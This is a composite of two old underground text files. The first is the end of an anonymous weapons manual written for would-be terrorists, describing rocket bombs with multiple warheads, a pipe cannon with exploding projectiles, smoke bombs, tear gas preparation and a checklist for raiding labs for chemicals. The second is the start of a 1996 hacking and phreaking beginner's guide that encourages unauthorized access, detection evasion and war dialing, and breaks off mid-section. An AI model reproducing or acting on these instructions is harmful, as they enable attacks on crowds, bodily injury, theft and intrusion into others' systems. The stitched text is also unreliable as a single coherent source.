     By cutting a coat hanger at the indicated arrows, and bending it, a
launch rod can be made.  After a fuse is inserted in the engine, the rocket is
simply slid down the launch rod, which is put through the segment of plastic
straw.  The rocket should slide easily along the coathanger.


                        ____
                       /    \
                      |      |
          cut here _____     |
                       |     |
                       |     |
                       |    / \
                       V   /   \
         _________________/     \________________
        /                                        \
       /                                          \
      /____________________________________________\
                                   ^
                                   |
                                   |
                    and here ______|


     Bend wire to this shape:


                         _______ insert into straw
                         |
                         |
                         |
                         V
          ____________________________________________
          \
           \
            \
             \
              \  <--------- bend here to adjust flight angle
               |
               |
               |
               |
               |
               | <---------- put this end in ground
               |


6.12     LONG RANGE ROCKET BOMB

     Long range rockets can be made by using multi-stage rockets.  Model
rocket engines with an "0" for a time delay are designed for use in multi-
stage rockets.  An engine such as the D12-0 is an excellent example of such an
engine.  Immediately after the thrust period is over, the ejection charge
explodes.  If another engine is placed directly against the back of an "0"
engine, the explosion of the ejection charge will send hot gasses and burning
particles into the nozzle of the engine above it, and ignite the thrust section.
 This will push the used "0" engine off of the rocket, causing an overall loss of
weight.  The main advantage of a multi-stage rocket is that it loses weight as
travels, and it gains velocity.  A multi-stage rocket must be designed somewhat
differently than a single stage rocket, since, in order for a rocket to fly
straight, its center of gravity must be ahead of its center of drag.  This is
accomplished by adding weight to the front of the rocket, or by moving the
center of drag back by putting fins on the rocket that are well behind the
rocket.  A diagram of a multi-stage rocket appears below:


                    ___
                   /   \
                   |   |
                   | C |
                   | M | ------ CM: Crater Maker
                   |   |
                   |   |
                   |___|
                   |   |
                   |   |
                   |   |
                   | C | ------ C6-5 rocket engine
                  /| 6 |\
                 / | | | \
                /  | 5 |  \
               /   |___|   \ ---- fin
              /   /|   |\   \
             /   / |   | \   \
            /   /  |   |  \   \
           /   /   | C |   \   \
          |   /    | 6 |    \   |
          |  /     | | |     \  |
          | /      | 0 |      \ |
          |/       |___|       \|
          |       /     \       |
          \______/   ^   \______/ ------- fin
                     |
                     |
                     |
                     |
                     C6-0 rocket engine


     The fuse is put in the bottom engine.


     Two, three, or even four stages can be added to a rocket bomb to give it
a longer range.  It is important, however, that for each additional stage, the
fin area gets larger.


6.13     MULTIPLE WARHEAD ROCKET BOMBS

     "M.R.V." is an acronym for Multiple Reentry Vehicle.  The concept is
simple: put more than one explosive warhead on a single missile.  This can be
done without too much difficulty by anyone who knows how to make crater-makers
and can buy rocket engines.  By attaching crater makers with long fuses to a
rocket, it is possible that a single rocket could deliver several explosive
devices to a target.  Such a rocket might look like this:


              ___
             /   \
             |   |
             | C |
             | M |
             |___|
          ___|   |___
          |  |   |  |
          |  | T |  |
         / \ | U | / \
        /   \| B |/   \
        |   || E ||   |
        | C ||   || C |
        | M ||   || M |
        |   ||___||   |
        \___/| E |\___/
             | N |
            /| G |\
           / | I | \
          /  | N |  \
         /   | E |   \
        /    |___|    \
       / fin/  |  \ fin\
      |    /   |   \    |
       \__/    |    \__/

               ^
               |____ fin


     The crater makers are attached to the tube of rolled paper with tape.
the paper tube is made by rolling and gluing a 4 inch by 8 inch piece of paper.
The tube is glued to the engine, and is filled with gunpowder or black powder.
Small holes are punched in it, and the fuses of the crater makers are inserted
in these holes.  A crater maker is glued to the open end of the tube, so that
its fuse is inside the tube.  A fuse is inserted in the engine, or in the bottom
engine if the rocket bomb is multi stage, and the rocket is launched from the
coathanger launcher, if a segment of a plastic straw has been attached to it.


6.2     CANNON

     The cannon is a piece of artillery that has been in use since the
11th century.  It is not unlike a musket, in that it is filled with powder,
loaded, and fired.  Cannons of this sort must also be cleaned after each shot,
otherwise, the projectile may jam in the barrel when it is fired, causing the
barrel to explode.  A sociopath could build a cannon without too much trouble,
if he/she had a little bit of money, and some patience.


6.21    BASIC PIPE CANNON

     A simple cannon can be made from a thick pipe by almost anyone.  The
only difficult part is finding a pipe that is extremely smooth on its interior.
This is absolutely necessary; otherwise, the projectile may jam.  Copper or
aluminum piping is usually smooth enough, but it must also be extremely thick to
withstand the pressure developed by the expanding hot gasses in a cannon.  If
one uses a projectile such as a CO2 cartridge, since such a projectile can be
made to explode, a pipe that is about 1.5 - 2 feet long is ideal.  Such a pipe
MUST have walls that are at least 1/3 to 1/2 an inch thick, and be very smooth
on the interior.  If possible, screw an endplug into the pipe.  Otherwise, the
pipe must be crimped and folded closed, without cracking or tearing the pipe.
A small hole is drilled in the back of the pipe near the crimp or endplug.
Then, all that need be done is fill the pipe with about two teaspoons of
grade blackpowder or pyrodex, insert a fuse, pack it lightly by ramming a wad
of tissue paper down the barrel, and drop in a CO2 cartridge.  Brace the cannon
securely against a strong structure, light the fuse, and run.  If the person is
lucky, he will not have overcharged the cannon, and he will not be hit by
pieces of exploding barrel.  Such a cannon would look like this:

             __________________ fuse hole
             |
             |
             V
      ________________________________________________________________
     | |______________________________________________________________|
     |endplug|powder|t.p.| CO2 cartridge
     | ______|______|____|____________________________________________
     |_|______________________________________________________________|


     An exploding projectile can be made for this type of cannon with a CO2
cartridge.  It is relatively simple to do.  Just make a crater maker, and
construct it such that the fuse projects about an inch from the end of the
cartridge.  Then, wrap the fuse with duct tape, covering it entirely, except for
a small amount at the end.  Put this in the pipe cannon without using a tissue
paper packing wad.  When the cannon is fired, it will ignite the end of the fuse,
and shoot the CO2 cartridge.  The explosive-filled cartridge will explode in
about three seconds, if all goes well.  Such a projectile would look like this:

           ___
          /   \
          |   |
          | C |
          | M |
          |   |
          |   |
          |\ /|
          | | | ---- tape
          |_|_|
            |
            | ------ fuse


6.22     ROCKET FIRING CANNON

     A rocket firing cannon can be made exactly like a normal cannon; the
only difference is the ammunition.  A rocket fired from a cannon will fly further
than a rocket alone, since the action of shooting it overcomes the initial
inertia.  A rocket that is launched when it is moving will go further than one
that is launched when it is stationary.  Such a rocket would resemble a normal
rocket bomb, except it would have no fins.  It would look like this:


           ___
          /   \
          |   |
          | C |
          | M |
          |   |
          |   |
          |___|
          | E |
          | N |
          | G |
          | I |
          | N |
          | E |
          |___|


     the fuse on such a device would, obviously, be short, but it would not
be ignited until the rocket's ejection charge exploded.  Thus, the delay before
the ejection charge, in effect, becomes the delay before the bomb explodes.
Note that no fuse need be put in the rocket; the burning powder in the cannon
will ignite it, and simultaneously push the rocket out of the cannon at a high
velocity.


7.0     PYROTECHNICA ERRATA

     There are many other types of pyrotechnics that a perpetrator of
violence might employ.  Smoke bombs can be purchased in magic stores, and large
military smoke bombs can be bought through adds in gun and military magazines.
Finally, fireworks can also be used as weapons of terror.  A large aerial display
rocket would cause many injuries if it were to be fired so that it landed on the
ground near a crowd of people.  Even the "harmless" pull-string fireworks, which
consists of a sort of firecracker that explodes when the strings running through
it are pulled, could be placed inside a large charge of a sensitive high
explosive.  Tear gas is another material that might well be useful to the
sociopath, and such a material could be instantly disseminated over a large
crowd by means of a rocket-bomb, with nasty effects.


7.1     SMOKE BOMBS

     One type of pyrotechnic device that might be employed by a terrorist in
many way would be a smoke bomb.  Such a device could conceal the getaway route,
or cause a diversion, or simply provide cover.  Such a device, were it to
produce enough smoke that smelled bad enough, could force the evacuation of a
building, for example.  Smoke bombs are not difficult to make.  Although the
military smoke bombs employ powdered white phosphorus or titanium compounds,
such materials are usually unavailable to even the most well-equipped terrorist.
Instead, he/she would have to make the smoke bomb for themselves.

     Most homemade smoke bombs usually employ some type of base powder, such
as black powder or pyrodex, to support combustion.  The base material will burn
well, and provide heat to cause the other materials in the device to burn, but
not completely or cleanly.  Table sugar, mixed with sulfur and a base material,
produces large amounts of smoke.  Sawdust, especially if it has a small amount
of oil in it, and a base powder works well also.  Other excellent smoke
ingredients are small pieces of rubber, finely ground plastics, and many
chemical mixtures.  The material in road flares can be mixed with sugar and
sulfur and a base powder produces much smoke.  Most of the fuel-oxodizer
mixtures, if the ratio is not correct, produce much smoke when added to a base
powder.  The list of possibilities goes on and on.  The trick to a successful
smoke bomb also lies in the container used.  A plastic cylinder works well, and
contributes to the smoke produced.  The hole in the smoke bomb where the fuse
enters must be large enough to allow the material to burn without causing an
explosion.  This is another plus for plastic containers, since they will melt
and burn when the smoke material ignites, producing an opening large enough to
prevent an explosion.


7.2     COLORED FLAMES

     Colored flames can often be used as a signaling device for terrorists.
by putting a ball of colored flame material in a rocket; the rocket, when the
ejection charge fires, will send out a burning colored ball.  The materials that
produce the different colors of flames appear below.


COLOR               MATERIAL                       USED IN
_____               ________                       _______
_______________________________________________________________________________
red                 strontium                      road flares,
                    salts                          red sparklers
                    (strontium nitrate)
_______________________________________________________________________________
green               barium salts                   green sparklers
                    (barium nitrate)
_______________________________________________________________________________
yellow              sodium salts                   gold sparklers
                    (sodium nitrate)
_______________________________________________________________________________
blue                powdered copper                blue sparklers,
                    old pennies
_______________________________________________________________________________
white               powdered magnesium             firestarters,
                    or aluminum                    aluminum foil
_______________________________________________________________________________
purple              potassium permanganate         purple fountains,
                                                   treating sewage
_______________________________________________________________________________


7.3     TEAR GAS

     A terrorist who could make tear gas or some similar compound could use
it with ease against a large number of people.  Tear gas is fairly complicated
to make, however, and this prevents such individuals from being able to utilize
its great potential for harm.  One method for its preparation is shown below.

     EQUIPMENT
     _________

     1.  ring stands (2)
     2.  alcohol burner
     3.  erlenmeyer flask, 300 ml
     4.  clamps (2)
     5.  rubber stopper
     6.  glass tubing
     7.  clamp holder
     8.  condenser
     9.  rubber tubing
     10.  collecting flask
     11.  air trap
     12.  beaker, 300 ml


     MATERIALS
     _________

     10 gms  glycerine

     2 gms sodium bisulfate

     distilled water


1)  In an open area, wearing a gas mask, mix 10 gms of glycerine with 2 gms
    of sodium bisulfate in the 300 ml erlenmeyer flask.

2)  Light the alcohol burner, and gently heat the flask.

3)  The mixture will begin to bubble and froth; these bubbles are tear gas.

4)  When the mixture being heated ceases to froth and generate gas, or a brown
    residue becomes visible in the tube, the reaction is complete.  Remove the
    heat source, and dispose of the heated mixture, as it is corrosive.

5)  The material that condenses in the condenser and drips into the collecting
    flask is tear gas.  It must be capped tightly, and stored in a safe place.


7.4     FIREWORKS


     While fireworks cannot really be used as an effective means of terror,
they do have some value as distractions or incendiaries.  There are several
basic types of fireworks that can be made in the home, whether for fun, profit,
or nasty uses.


7.41     FIRECRACKERS

     A simple firecracker can be made from cardboard tubing and epoxy.
The instructions are below:

     1) Cut a small piece of cardboard tubing from the tube you are using.
        "Small" means anything less than 4 times the diameter of the tube.

     2) Set the section of tubing down on a piece of wax paper, and fill
        it with epoxy and the drying agent to a height of 3/4 the diameter
        of the tubing.  Allow the epoxy to dry to maximum hardness, as
        specified on the package.

     3) When it is dry, put a small hole in the middle of the tube, and
        insert a desired length of fuse.

     4) Fill the tube with any type of flame-sensitive explosive.  Flash
        powder, pyrodex, black powder, potassium picrate, lead azide,
        nitrocellulose, or any of the fast burning fuel-oxodizer mixtures
        will do nicely.  Fill the tube almost to the top.

     5) Pack the explosive tightly in the tube with a wad of tissue paper
        and a pencil or other suitable ramrod.  Be sure to leave enough space
         for more epoxy.

     6) Fill the remainder of the tube with the epoxy and hardener, and allow
         it to dry.

     7) For those who wish to make spectacular firecrackers, always use
        flash powder, mixed with a small amount of other material for
        colors.  By crushing the material on a sparkler, and adding it
        to the flash powder, the explosion will be the same color as the
        sparkler.   By adding small chunks of sparkler material, the
        device will throw out colored burning sparks, of the same color
        as the sparkler.  By adding powdered iron, orange sparks will
        be produced.  White sparks can be produced from magnesium shavings,
        or from small, LIGHTLY crumpled balls of aluminum foil.

        Example:  Suppose I wish to make a firecracker that will explode
               with a red flash, and throw out white sparks.  First,
               I would take a road flare, and finely powder the material
               inside it.   Or, I could take a red sparkler, and finely
               powder it.  Then, I would mix a small amount of this
               material with the flash powder.  (NOTE: FLASH POWDER
               MAY REACT WITH SOME MATERIALS THAT IT IS MIXED WITH, AND
               EXPLODE SPONTANEOUSLY!)  I would mix it in a ratio of
               9 parts flash powder to 1 part of flare or sparkler
               material, and add about 15 small balls of aluminum foil
               I would store the material in a plastic bag overnight
               outside of the house, to make sure that the stuff doesn't
               react.  Then, in the morning, I would test a small amount
               of it, and if it was satisfactory, I would put it in the
               firecracker.

     8) If this type of firecracker is mounted on a rocket engine,
        professional to semi-professional displays can be produced.


7.42     SKYROCKETS

     An impressive home made skyrocket can easily be made in the home from
model rocket engines.  Estes engines are recommended.

     1) Buy an Estes Model Rocket Engine of the desired size, remembering
        that the power doubles with each letter.  (See sect. 6.1 for details)

     2) Either buy a section of body tube for model rockets that exactly
        fits the engine, or make a tube from several thicknesses of paper
        and glue.

     3) Scrape out the clay backing on the back of the engine, so that
        the powder is exposed.  Glue the tube to the engine, so that the
        tube covers at least half the engine.  Pour a small charge of
        flash powder in the tube, about 1/2 an inch.

     4) By adding materials as detailed in the section on firecrackers,
        various types of effects can be produced.

     5) By putting Jumping Jacks or bottle rockets without the stick
        in the tube, spectacular displays with moving fireballs or
           M.R.V.'s can be produced.

     6) Finally, by mounting many home made firecrackers on the tube with
        the fuses in the tube, multiple colored bursts can be made.


7.43     ROMAN CANDLES

     Roman candles are impressive to watch.  They are relatively difficult
to make, compared to the other types of home-made fireworks, but they are
well worth the trouble.

     1) Buy a 1/2 inch thick model rocket body tube, and reinforce it
        with several layers of paper and/or masking tape.  This must
        be done to prevent the tube from exploding.  Cut the tube into
        about 10 inch lengths.

     2) Put the tube on a sheet of wax paper, and seal one end with epoxy
        and the drying agent.  About 1/2 of an inch is sufficient.

     3) Put a hole in the tube just above the bottom layer of epoxy,
        and insert a desired length of water proof fuse.  Make sure that
        the fuse fits tightly.

     4) Pour about 1 inch of pyrodex or gunpowder down the open end of the
        tube.

     5) Make a ball by powdering about two 6 inch sparklers of the desired
        color.  Mix this powder with a small amount of flash powder and
        a small amount of pyrodex, to have a final ratio (by volume) of
        60% sparkler material / 20% flash powder / 20% pyrodex.  After
        mixing the powders well, add water, one drop at a time, and mixing
        continuously, until a damp paste is formed.  This paste should
        be moldable by hand, and should retain its shape when left alone.
        Make a ball out of the paste that just fits into the tube.  Allow
        the ball to dry.

     6) When it is dry, drop the ball down the tube.  It should slide down
        fairly easily.  Put a small wad of tissue paper in the tube, and pack
         it gently against the ball with a pencil.

     7) When ready to use, put the candle in a hole in the ground, pointed
        in a safe direction, light the fuse, and run.  If the device works,
        a colored fireball should shoot out of the tube to a height of
        about 30 feet.  This height can be increased by adding a slightly
        larger powder charge in step 4, or by using a slightly longer tube.

     8) If the ball does not ignite, add slightly more pyrodex in step 5.

     9) The balls made for roman candles also function very well in rockets,
        producing an effect of falling colored fireballs.


8.0     LISTS OF SUPPLIERS AND MORE INFORMATION

     Most, if not all, of the information in this publication can be obtained
through a public or university library.  There are also many publications that
are put out by people who want to make money by telling other people how to
make explosives at home.  Adds for such appear frequently in paramilitary
magazines and newspapers.  This list is presented to show the large number of
places that information and materials can be purchased from.   It also includes
fireworks companies and the like.


COMPANY NAME AND ADDRESS               WHAT COMPANY SELLS
________________________               __________________


FULL AUTO CO. INC.                     EXPLOSIVE RECIPES,
P.O. BOX 1881                          PAPER TUBING
MURFREESBORO, TN
37133
_______________________________________________________________________________

UNLIMITED                              CHEMICALS AND FUSE
BOX 1378-SN
HERMISTON, OREGON
97838
_______________________________________________________________________________

AMERICAN FIREWORKS NEWS                FIREWORKS NEWS MAGAZINE WITH
SR BOX 30                              SOURCES AND TECHNIQUES
DINGMAN'S FERRY, PENNSYLVANIA
18328
_______________________________________________________________________________

BARNETT INTERNATIONAL INC.             BOWS, CROSSBOWS, ARCHERY MATERIALS,
125 RUNNELS STREET                     AIR RIFLES
P.O. BOX 226
PORT HURON, MICHIGAN
48060
_______________________________________________________________________________

CROSSMAN AIR GUNS                      AIR GUNS
P.O. BOX 22927
ROCHESTER, NEW YORK
14692
_______________________________________________________________________________

EXECUTIVE PROTECTION PRODUCTS INC.     TEAR GAS GRENADES,
316 CALIFORNIA AVE.                    PROTECTION DEVICES
RENO, NEVADA
89509
_______________________________________________________________________________

BADGER FIREWORKS CO. INC.              CLASS "B" AND "C" FIREWORKS
BOX 1451
JANESVILLE, WISCONSIN
53547
_______________________________________________________________________________

NEW ENGLAND FIREWORKS CO. INC.         CLASS "C" FIREWORKS
P.O. BOX 3504
STAMFORD, CONNECTICUTT
06095
_______________________________________________________________________________

RAINBOW TRAIL                          CLASS "C" FIREWORKS
BOX 581
EDGEMONT, PENNSYLVANIA
19028
_______________________________________________________________________________

STONINGTON FIREWORKS INC.              CLASS "C" AND "B" FIREWORKS
4010 NEW WILSEY BAY U.25 ROAD
RAPID RIVER, MICHIGAN
49878
_______________________________________________________________________________

WINDY CITY FIREWORKS INC.              CLASS "C" AND "B" FIREWORKS
P.O. BOX 11                            {GOOD PRICES!}
ROCHESTER, INDIANNA
46975
_______________________________________________________________________________


BOOKS
_____

THE ANARCHIST'S COOKBOOK

THE IMPROVISED MUNITIONS MANUAL

MILITARY EXPLOSIVES

FIRES AND EXPLOSIONS


9.0     CHECKLIST FOR RAIDS ON LABS

     In the end, the serious terrorist would probably realize that if he/she
wishes to make a truly useful explosive, he or she will have to steal the
chemicals to make the explosive from a lab.  A list of such chemicals in order
of priority would probably resemble the following:

     LIQUIDS                    SOLIDS
     _______                    ______

     ____     Nitric Acid        ____     Potassium Perchlorate
     ____     Sulfuric Acid      ____     Potassium Chlorate
     ____     95% Ethanol        ____     Picric Acid (usually a powder)
     ____     Toluene            ____     Ammonium Nitrate
     ____     Perchloric Acid    ____     Powdered Magnesium
     ____     Hydrochloric Acid  ____     Powdered Aluminum

                         ____    Potassium Permanganate
                         ____    Sulfur
                         ____    Mercury
                         ____    Potassium Nitrate
                         ____    Potassium Hydroxide
                         ____    Phosphorus
                         ____    Sodium Azide
                         ____    Lead Acetate
                         ____    Barium Nitrate


10.0     USEFUL PYROCHEMISTRY

     In general, it is possible to make many chemicals from just a few basic
ones.  A list of useful chemical reactions is presented.  It assumes knowledge
of general chemistry; any individual who does not understand the following
reactions would merely have to read the first five chapters of a high school
chemistry book.


1.  potassium perchlorate from perchloric acid and potassium hydroxide
     K(OH)       +     HClO     ---->     KClO     +    H O
                   4              4           2

2.  potassium nitrate from nitric acid and potassium hydroxide
      "       +     HNO     ---->     KNO     +     "
                  3             3

3.  ammonium perchlorate from perchloric acid and ammonium hydroxide
     NH OH       +     HClO     ---->     NH ClO     +     "
       3              4                 3   4

4.  ammonium nitrate from nitric acid and ammonium hydroxide
        NH OH       +     HNO     ---->     NH NO     +     "
       3             3                      3  3

5.  powdered aluminum from acids, aluminum foil, and magnesium

A.     aluminum foil    +    6HCl    ---->   2AlCl   +   3H
                                                3            2

B.     2AlCl  (aq)   +    3Mg    ---->  3MgCl (aq)   +  2Al
          3                                  2

     The Al will be a very fine silvery powder at the bottom of the container
which must be filtered and dried.   This same method works with nitric and
sulfuric acids, but these acids are too valuable in the production of high
explosives to use for such a purpose, unless they are available in great excess.


11.0     ABOUT THE AUTHOR

     The author, who wishes his name to be unknown, is presently attending
a college in the United States of America, majoring in Engineering.  He was
raised by his parents on the East Coast, and received his high school education
there.  He first became interested in pyrotechnics when he was about eight years
of age.  At age twelve, he produced his first explosive device; it was slightly
more powerful than a large firecracker.  He continued to produce explosive
devices for several years.  He also became interested in model rocketry, and has
built several rockets from kits, and designed his own rockets.  While in high
school, the author became affiliated with CHAOS, and eventually became the
head of Gunzenbomz Pyro-Technologies.  At this time, at age 18, he produced
his first high explosive device, putting a 1 foot deep crater in an associate's
back yard.  He had also produced many types of rockets, explosive ammunition,
and other pyrotechnic devices.  While he was heading Gunzenbomz Pyro-
Technologies, he was injured when a home made device exploded in his hand; he
did not make the device.  The author learned, however, and  then decided to
reform, and although he still constructs an occasional explosive device, he
chooses to abstain from their production.  An occasional rocket that produces
effects similar to that of professional displays can sometimes be seen in the
midnight sky near his college, and the Fourth of July is still his favorite day
of the year.


               Pax et Discordia,
               The Author



  
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
######################################################################
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
**********************************************************************
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                                                    +
+       THE ULTIMATE BEGINNER'S GUIDE TO HACKING AND PHREAKING       +
+                                                                    +
+                                                                    +
+                                                                    +
+                                                                    +
+                                BY                                  +
+                            REVELATION                              +
+                             LOA--ASH                               +
+                                                                    +
+                                                                    +
+                                                                    +
+                                                                    +
+                                                                    +
+ Written: 08/4/96                                         Volume: 1 +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
**********************************************************************
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
######################################################################
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Anyway, for those of you who are wondering "what do the letters "LOA" under his handle stand for?" Well, LOA stands for Legion Of the Apocalypse, which is a group of elite hackers and phreakers in my area. The current members of LOA are: 
Revelation, Phreaked Out, Phreak Show, Logik Bomb, and Silicon Toad 

I started LOA when I discovered that there were many good hackers and phreakers in my area. I thought that an organized group of hackers and phreakers would accomplish much more than an individual could by himself. Thus the Legion Of the Apocalypse was formed and has been around for a while since. Our main goal is to show the public what hacking and phreaking is all about and to reveal confidential information to the hacking/phreaking community so that we can learn more about computers, telephones, electronics, etc. We are hoping to get our own World Wide Web page soon, so keep an eye out for it. It will contain all of the hacking, phreaking, computer, telephone, security, electronics, virus, and carding information that you could possibly want. 

Also, if some of you are wondering why I chose the word Revelation as my handle, well, Revelation means revealing or unveiling, which is exactly what I intend to do as a hacker/phreaker. I intend to reveal all the information that I can gather while hacking and phreaking. 

Anyway, I wrote this document because I have read all the files that I could get my hands on and noticed that there has never been a really good file written that guided beginning hackers and phreakers step by step. 

When I began hacking and started reading all of the beginner files, I still had many un-answered questions. My questions were eventually answered, but only through LOTS of reading and practice. In this file, I hope to give basic step by step instructions that will help beginning hackers and phreakers get started. But, DO NOT think that this will save you from having to read alot. If you want to be a hacker/phreaker, reading is the most important thing you can do. You will have to do ALOT of reading no matter what. 

This document was intended for beginners, but it can also be used as a reference tool for advanced hackers and phreakers. 

Please distribute this document freely. Give it to anyone that you know who is interested in hacking and/or phreaking. Post it on your World Wide Web page, Ftp sites, and BBS's. Do whatever you want with it as long as it stays UNCHANGED. 

As far as I know, this is the most complete and in depth beginners guide available, that is why I wrote it. Also, I plan to have new volumes come out whenever there has been a significant change in the material provided, so keep an eye out for them. LOA is planning on starting an on-line magazine, so look for that too. And we are also starting a hacking business. Owners of businesses can hire us to hack into their systems to find the security faults. The name of this company is A.S.H. (American Security Hackers), and it is run by LOA. If you have any questions about this company, or would like to hire us, or just want security advice, please E-Mail A.S.H. at: "revelationmail@usa.pipeline.com". Readers can also send comments and questions to this address. 

This document is divided into three main sections with many different sub-sections in them. The Table Of Contents is below: 

Table Of Contents: 

I. HACKING 

A. What is hacking? 
B. Why hack? 
C. Hacking rules 
D. Getting started 
E. Where and how to start hacking 
F. Telenet commands 
G. Telenet dialups 
H. Telenet DNIC's 
I. Telenet NUA's 
J. Basic UNIX hacking 
K. Basic VAX/VMS hacking 
L. Basic PRIME hacking 
M. Password list 
N. Connecting modems to different phone lines 
O. Viruses, Trojans, and Worms 

II. PHREAKING 

A. What is phreaking? 
B. Why phreak? 
C. Phreaking rules 
D. Where and how to start phreaking 
E. Boxes and what they do 
F. Red Box plans 
G. Free calling from COCOT's 
H. ANAC numbers 

III. REFERENCE 

A. Hacking and phreaking W.W.W. pages 
B. Good hacking and phreaking text files 
C. Hacking and phreaking Newsgroups 
D. Rainbow Books 
E. Hacking and phreaking magazines 
F. Hacking and phreaking movies 
G. Hacking and phreaking Gopher sites 
H. Hacking and phreaking Ftp sites 
I. Hacking and phreaking BBS's 
J. Cool hackers and phreakers 
K. Hacker's Manifesto 
L. Happy hacking! 

* DISCLAIMER * 

"Use this information at your own risk. I Revelation, nor any other member of LOA, nor the persons providing this file, will NOT assume ANY responsibility for the use, misuse, or abuse, of the information provided herein. The following information is provided for educational purposes ONLY. The informaion is NOT to be used for illegal purposes. By reading this file you ARE AGREEING to the following terms: I understand that using this information is illegal. I agree to, and understand, that I am responsible for my own actions. If I get into trouble using this information for the wrong reasons, I promise not to place the blame on Revelation, LOA, or anyone that provided this file. I understand that this information is for educational purposes only. This file may be used to check your security systems and if you would like a thorough check contact A.S.H. 

This file is basically a compilation of known hacking and phreaking information and some information gathered from my own experience as a hacker/phreaker. I have tried to make sure that everything excerpted from other documents was put in quotes and labeled with the documents name, and if known, who wrote it. I am sorry if any mistakes were made with quoted information." 

*-Revelation-*
LOA
I. HACKING 

A. What is hacking? 

Hacking is the act of penetrating computer systems to gain knowledge about the system and how it works. 

Hacking is illegal because we demand free access to ALL data, and we get it. This pisses people off and we are outcasted from society, and in order to stay out of prison, we must keep our status of being a hacker/phreaker a secret. We can't discuss our findings with anyone but other members of the hacking/phreaking community for fear of being punished. We are punished for wanting to learn. Why is the government spending huge amounts of time and money to arrest hackers when there are other much more dangerous people out there. It is the murderers, rapists, terrorists, kidnappers, and burglers who should be punished for what they have done, not hackers. We do NOT pose a threat to anyone. We are NOT out to hurt people or there computers. I admit that there are some people out there who call themselves hackers and who deliberately damage computers. But these people are criminals, NOT hackers. I don't care what the government says, we are NOT criminals. We are NOT trying to alter or damage any system. This is widely misunderstood. Maybe one day people will believe us when we say that all we want is to learn. 

There are only two ways to get rid of hackers and phreakers. One is to get rid of computers and telephones, in which case we would find other means of getting what we want.(Like that is really going to happen.) The other way is to give us what we want, which is free access to ALL information. Until one of those two things happen, we are not going anywhere. 

B. Why hack? 

As said above, we hack to gain knowledge about systems and the way they work. We do NOT want to damage systems in any way. If you do damage a system, you WILL get caught. But, if you don't damage anything, it is very unlikely that you will be noticed, let alone be tracked down and arrested, which costs a considerable amount of time and money. 

Beginners should read all the files that they can get their hands on about anything even remotely related to hacking and phreaking, BEFORE they start hacking. I know it sounds stupid and boring but it will definetly pay off in the future. The more you read about hacking and phreaking, the more unlikely it is that you will get caught. Some of the most useless pieces of information that you read could turn out to be the most helpful. That is why you need to read everything possible. 

C. Hacking rules 

1. Never damage any system. This will only get you into trouble. 

2. Never alter any of the systems files, except for those needed to insure that you are not detected, and those to insure that you have access into that computer in the future. 

3. Do not share any information about your hacking projects with anyone but those you'd trust with your life. 

4. When posting on BBS's (Bulletin Board Systems) be as vague as possible when describing your current hacking projects. BBS's CAN be monitered by law enforcement. 

5. Never use anyone's real name or real phone number when posting on a BBS. 

6. Never leave your handle on any systems that you hack in to. 

7. DO NOT hack government computers. 

8. Never speak about hacking projects over your home telephone line. 

9. Be paranoid. Keep all of your hacking materials in a safe place. 

10. To become a real hacker, you have to hack. You can't just sit around reading text files and hanging out on BBS's. This is not what hacking is all about. 

D. Getting started 

The very first thing you need to do is get a copy of PKZIP or some other file unzipping utility. Nearly everything that you download from the Internet or from a BBS will be zipped. A zipped file is a file that has been compressed. Zipped files end with the extension ".zip". 

Then you need to get yourself a good prefix scanner.(also known as a War Dialer) This is a program that automatically dials phone numbers beginning with the three numbers (prefix) that you specify. It checks to see if the number dialed has a carrier.(series of beeps that tells you that you have dialed a computer) Try and find a large business area prefix to scan. It is these businesses that have interesting computers. There are many good scanners out there, but I would recommend Autoscan or A-Dial. These are very easy to use and get the job done quickly and efficiently. 

E. Where and how to start hacking 

After you get yourself a good scanner, scan some prefixes and find some cool dialups, then do the following: From your terminal, dial the number you found. Then you should hear a series of beeps (carrier) which tells you that you are connecting to a remote computer. It should then say something like "CONNECT 9600" and then identify the system that you are on. If nothing happens after it says "CONNECT 9600" try hitting enter a few times. If you get a bunch of garbage adjust your parity, data bits, stop bits, baud rate, etc., until it becomes clear. 

That is one way of connecting to a remote computer. Another way is through Telenet or some other large network. 

Telenet is a very large network that has many other networks and remote computers connected to it. 

Ok, here is how you would connect to a remote computer through Telenet: 

First, you get your local dialup(phone number) from the list that I have provided in Section G. Then you dial the number from your terminal and connect.(If you get a bunch of garbage try changing your parity to odd and your data bits to 7, this should clear it up.) If it just sits there hit enter and wait a few seconds, then hit enter again. Then it will say "TERMINAL=" and you type in your terminal emulation. If you don't know what it is just hit enter. Then it will give you a prompt that looks like "@". From there you type "c" and then the NUA (Network User Address) that you want to connect to. After you connect to the NUA, the first thing you need to do is find out what type of system you are on.(i.e. UNIX, VAX/VMS, PRIME, etc.) 

There are other things that you can do on Telenet besides connecting to an NUA. Some of these commands and functions are listed in the next section. 

You can only connect to computers which accept reverse charging. The only way you can connect to computers that don't accept reverse charging is if you have a Telenet account. You can try hacking these. To do this, at the "@" prompt type "access". It will then ask you for your Telenet ID and password. 

Telenet is probably the safest place to start hacking because of the large numbers of calls that they get. Make sure you call during business hours (late morning or early afternoon) so there are many other people on-line. 

F. Telenet commands 

Here is a list of some Telenet commands and their functions. This is only a partial list. Beginners probably won't use these commands, but I put them here for reference anyway. 

COMMAND                                 FUNCTION

